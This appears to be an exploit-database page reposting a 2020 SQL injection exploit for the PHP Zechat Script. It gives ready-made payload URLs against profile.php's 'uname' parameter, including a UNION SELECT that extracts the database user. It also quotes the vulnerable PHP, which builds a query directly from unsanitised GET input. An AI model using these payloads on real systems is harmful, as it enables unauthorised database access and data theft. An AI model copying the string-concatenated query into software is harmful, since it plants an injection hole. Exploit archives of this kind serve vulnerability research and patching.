Advertisement






PHP Zechat Script - Sql Injection

CVE Category Price Severity
N/A CWE-89 Not specified High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2020-07-31
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.75 0.99

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070155

Below is a copy:

PHP Zechat Script - Sql Injection
# Exploit Title: PHP Zechat Script - Sql Injection
# Date: 2020-07-30
# Exploit Author: AadministratorR - [email protected]
# Vendor Homepage: https://bylancer.com/products/zechat-php-script
# Tested on: Ubunto,Windows10 
# Dork: N/A

Exploit:
https://localhost/profile.php?uname=-admin%27+[sql+command]%23
https://localhost/profile.php?uname=-admin%27+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23


$uName = strtolower($_GET['uname']);
if(!isset($_GET['uname']))

$query1 = "SELECT * FROM `".$config['db']['pre']."userdata` where username = '".$_GET['uname']."'";
$result1 = $con->query($query1);

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum